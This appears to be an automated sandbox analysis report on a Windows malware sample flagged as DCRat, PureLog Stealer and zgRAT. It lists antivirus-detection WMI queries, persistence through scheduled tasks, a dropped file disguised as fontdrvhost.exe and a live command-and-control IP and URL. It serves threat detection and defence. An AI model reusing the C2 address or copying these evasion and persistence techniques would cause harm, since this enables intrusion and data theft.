Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Queries volume information: C:\Users\user\AppData\Local\fontdrvhost.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: fontdrvhost.exe, 00000008.00000002.1748627136.000000001BF70000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000008.00000002.1745557106.000000001B0DC000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000002.1998188991.000000001B3E9000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000023.00000002.2653167450.000000001B950000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000002A.00000002.2103426522.0000000001896000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000033.00000002.2698860484.000000001B70B000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000034.00000002.2494300205.000000001B141000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000034.00000002.2506178713.000000001BDE0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information
barindex
Yara detected DCRat
Source: Yara match File source: 00000000.00000002.1651517514.0000000013466000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ZT3pxe2Tb4.exe PID: 4484, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: fontdrvhost.exe PID: 5496, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: fontdrvhost.exe PID: 6648, type: MEMORYSTR
Yara detected PureLog Stealer
Source: Yara match File source: ZT3pxe2Tb4.exe, type: SAMPLE
Source: Yara match File source: 0.0.ZT3pxe2Tb4.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1606720859.00000000009E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\fontdrvhost.exe, type: DROPPED
Yara detected zgRAT
Source: Yara match File source: ZT3pxe2Tb4.exe, type: SAMPLE
Source: Yara match File source: 0.0.ZT3pxe2Tb4.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\fontdrvhost.exe, type: DROPPED

Remote Access Functionality
barindex
Yara detected DCRat
Source: Yara match File source: 00000000.00000002.1651517514.0000000013466000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ZT3pxe2Tb4.exe PID: 4484, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: fontdrvhost.exe PID: 5496, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: fontdrvhost.exe PID: 6648, type: MEMORYSTR
Yara detected PureLog Stealer
Source: Yara match File source: ZT3pxe2Tb4.exe, type: SAMPLE
Source: Yara match File source: 0.0.ZT3pxe2Tb4.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1606720859.00000000009E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\fontdrvhost.exe, type: DROPPED
Yara detected zgRAT
Source: Yara match File source: ZT3pxe2Tb4.exe, type: SAMPLE
Source: Yara match File source: 0.0.ZT3pxe2Tb4.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\fontdrvhost.exe, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1417387 Sample: ZT3pxe2Tb4.exe Startdate: 29/03/2024 Architecture: WINDOWS Score: 100 187 Snort IDS alert for network traffic 2->187 189 Antivirus detection for dropped file 2->189 191 Antivirus / Scanner detection for submitted sample 2->191 193 9 other signatures 2->193 14 ZT3pxe2Tb4.exe 4 30 2->14         started        18 fontdrvhost.exe 14 27 2->18         started        21 fontdrvhost.exe 2 2->21         started        process3 dnsIp4 153 C:\Users\user\Desktop\zsrQNmVQ.log, PE32 14->153 dropped 155 C:\Users\user\Desktop\xvPIrmGV.log, PE32 14->155 dropped 157 C:\Users\user\Desktop\wHLAFYKX.log, PE32 14->157 dropped 165 20 other malicious files 14->165 dropped 205 Detected unpacking (creates a PE file in dynamic memory) 14->205 207 Uses schtasks.exe or at.exe to add and modify task schedules 14->207 209 Creates processes via WMI 14->209 23 cmd.exe 1 14->23         started        26 schtasks.exe 14->26         started        28 schtasks.exe 14->28         started        30 schtasks.exe 14->30         started        185 89.23.98.225, 49730, 49731, 49738 MAXITEL-ASRU Russian Federation 18->185 159 C:\Users\user\Desktop\ylQifTUJ.log, PE32 18->159 dropped 161 C:\Users\user\Desktop\uvZrYWTP.log, PE32 18->161 dropped 163 C:\Users\user\Desktop\pzYaRqdW.log, PE32 18->163 dropped 167 19 other malicious files 18->167 dropped 211 Antivirus detection for dropped file 18->211 213 Multi AV Scanner detection for dropped file 18->213 215 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 18->215 217 Machine Learning detection for dropped file 18->217 32 cmd.exe 1 18->32         started        file5 signatures6 process7 signatures8 197 Uses ping.exe to sleep 23->197 199 Uses ping.exe to check the status of other devices and networks 23->199 34 fontdrvhost.exe 26 23->34         started        37 conhost.exe 23->37         started        39 PING.EXE 1 23->39         started        41 chcp.com 1 23->41         started        43 fontdrvhost.exe 32->43         started        45 conhost.exe 32->45         started        47 PING.EXE 1 32->47         started        49 chcp.com 1 32->49         started        process9 file10 113 C:\Users\user\Desktop\zfzIrCEh.log, PE32 34->113 dropped 115 C:\Users\user\Desktop\sXAbZyyE.log, PE32 34->115 dropped 117 C:\Users\user\Desktop\phJkSByL.log, PE32 34->117 dropped 125 19 other malicious files 34->125 dropped 51 cmd.exe 34->51         started        119 C:\Users\user\Desktop\zntiAIEO.log, PE32 43->119 dropped 121 C:\Users\user\Desktop\yEAAOeyR.log, PE32 43->121 dropped 123 C:\Users\user\Desktop\xHZssejW.log, PE32 43->123 dropped 127 19 other malicious files 43->127 dropped 54 cmd.exe 43->54         started        process11 signatures12 195 Uses ping.exe to sleep 51->195 56 fontdrvhost.exe 51->56         started        59 conhost.exe 51->59         started        61 chcp.com 51->61         started        63 PING.EXE 51->63         started        65 fontdrvhost.exe 54->65         started        67 conhost.exe 54->67         started        69 chcp.com 54->69         started        71 PING.EXE 54->71         started        process13 file14 137 C:\Users\user\Desktop\zldaSYtH.log, PE32 56->137 dropped 139 C:\Users\user\Desktop\wsOrhbIJ.log, PE32 56->139 dropped 141 C:\Users\user\Desktop\nJvbxzCb.log, PE32 56->141 dropped 149 19 other malicious files 56->149 dropped 73 cmd.exe 56->73         started        143 C:\Users\user\Desktop\sihlzJJp.log, PE32 65->143 dropped 145 C:\Users\user\Desktop\rudcNvNr.log, PE32 65->145 dropped 147 C:\Users\user\Desktop\rmtKjMmm.log, PE32 65->147 dropped 151 19 other malicious files 65->151 dropped 75 cmd.exe 65->75         started        process15 signatures16 78 fontdrvhost.exe 73->78         started        81 conhost.exe 73->81         started        83 chcp.com 73->83         started        85 w32tm.exe 73->85         started        201 Uses ping.exe to sleep 75->201 87 fontdrvhost.exe 75->87         started        89 conhost.exe 75->89         started        91 chcp.com 75->91         started        93 PING.EXE 75->93         started        process17 file18 169 C:\Users\user\Desktop\zReaumVj.log, PE32 78->169 dropped 171 C:\Users\user\Desktop\xgyKnYKq.log, PE32 78->171 dropped 173 C:\Users\user\Desktop\xOrrZDRn.log, PE32 78->173 dropped 181 19 other malicious files 78->181 dropped 95 cmd.exe 78->95         started        175 C:\Users\user\Desktop\zuGjoWSN.log, PE32 87->175 dropped 177 C:\Users\user\Desktop\zTojkKNX.log, PE32 87->177 dropped 179 C:\Users\user\Desktop\uHokLZDZ.log, PE32 87->179 dropped 183 19 other malicious files 87->183 dropped 97 cmd.exe 87->97         started        process19 process20 99 fontdrvhost.exe 95->99         started        102 conhost.exe 95->102         started        104 chcp.com 95->104         started        106 w32tm.exe 95->106         started        108 conhost.exe 97->108         started        file21 129 C:\Users\user\Desktop\zzDSBAiP.log, PE32 99->129 dropped 131 C:\Users\user\Desktop\wOXBumXW.log, PE32 99->131 dropped 133 C:\Users\user\Desktop\sYhLnqXd.log, PE32 99->133 dropped 135 19 other malicious files 99->135 dropped 110 cmd.exe 99->110         started        process22 signatures23 203 Uses ping.exe to sleep 110->203
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
89.23.98.225
 unknown Russian Federation
48687 MAXITEL-ASRU true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://89.23.98.225/8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php true
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown